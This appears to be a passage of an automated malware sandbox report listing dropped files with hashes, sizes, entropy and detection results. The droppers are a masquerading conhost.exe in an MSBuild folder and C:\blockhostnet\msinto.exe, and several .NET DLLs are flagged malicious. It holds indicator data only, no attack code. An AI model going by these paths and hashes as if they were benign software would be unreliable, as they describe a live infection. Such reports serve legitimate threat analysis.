                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 29%
                                                          Joe Sandbox View:
                                                          • Filename: VUZeEe6Nhz.exe, Detection: malicious
                                                          • Filename: KYwOaWhyl6.exe, Detection: malicious
                                                          • Filename: HdXeCzyZD9.exe, Detection: malicious
                                                          • Filename: mElivBCOq1.exe, Detection: malicious
                                                          • Filename: RqZ4ruld94.exe, Detection: malicious
                                                          • Filename: dvfpH6JJJC.exe, Detection: malicious
                                                          • Filename: WR5wwWlTVi.exe, Detection: malicious
                                                          • Filename: NCTSgL4t0B.exe, Detection: malicious
                                                          • Filename: TJWbSGBK0I.exe, Detection: malicious
                                                          • Filename: povqqKBcoP.exe, Detection: malicious
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          • Antivirus: Virustotal, Detection: 41%
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
